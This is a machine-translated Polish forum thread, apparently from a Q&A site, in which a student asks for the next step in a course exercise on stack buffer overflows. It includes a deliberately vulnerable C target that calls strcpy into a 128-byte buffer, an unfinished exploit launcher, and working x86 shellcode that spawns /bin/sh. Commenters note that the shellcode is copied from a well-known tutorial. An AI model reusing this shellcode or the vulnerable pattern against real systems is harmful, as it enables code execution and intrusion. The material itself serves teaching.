Próbuję rozgryźć ten problem dla jednej z moich klas Comp Sci, wykorzystałem każdy zasób i wciąż mam problemy, jeśli ktoś mógłby zapewnić pewien wgląd, bardzo bym to docenił.Intencjonalny program wykorzystujący przepełnienie bufora
Mam ten "cel" Potrzebuję wykonać execve ("/ bin/sh") z exploita przepełnienia bufora. W przepełnieniu buf [128], podczas wykonywania niebezpiecznego polecenia strcpy, wskaźnik z powrotem do bufora pojawia się w miejscu, w którym system spodziewa się znaleźć adres zwrotny.
target.c
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I zrozumieć, że trzeba wypełnić argv [1] dla 128 bajtów, Bajty powyżej 128 to adres zwrotny, który należy skierować z powrotem do bufora, aby wykonywał on/bin/sh wewnątrz. Czy to jest do tej pory poprawne? Czy ktoś może zapewnić następny krok?
Dziękuję bardzo za pomoc.
Przepełnienie stosu i przepełnienie bufora to dwie zupełnie różne rzeczy. – BoltClock
Jest to w dużym stopniu zależne od systemu (kompilator, procesor itp.) I użytkownik nie zadał sobie trudu, aby to określić. –
Nie mogłem nie zauważyć, że twój kod powłoki jest dokładną kopią znalezionego [tutaj] (http://insecure.org/stf/smashstack.html). Powinieneś prawdopodobnie przeczytać ten artykuł i zrozumieć, co się dzieje, abyś mógł wdrożyć własne. Plagiat na uniwersytecie to poważna sprawa. – Paul